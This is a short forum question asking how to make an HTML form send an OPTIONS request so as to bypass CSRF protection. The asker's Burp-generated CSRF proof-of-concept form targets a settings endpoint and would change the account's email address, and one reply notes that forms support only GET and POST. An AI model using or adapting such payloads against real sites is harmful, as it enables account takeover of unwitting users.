# How I can send Form with OPTIONS Method

Tags: html, forms, security, web

I want to send Form with OPTIONS Method to bypass csrf

```html
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite plugin -->
<body>
    <form method="OPTIONS" action="https://www.target.com:443/resource/UserSettingsResource/update/?source_url=%2Fsettings%2Faccount-settings%2F&data=%7B%22options%22%3A%7B%22email%22%3A%22pdsuuw%40arxxwalls.com%22%2C%22surface_tag%22%3A%22settings%22%7D%2C%22context%22%3A%7B%7D%7D">
        <input type="submit" value="Send">
    </form>
</body>
</html>
```

The issue is when the request go.> the form change the OPTIONS method to GET method by default! so any solution?

Comment: You can't do that this way. Forms are for GET and POST only.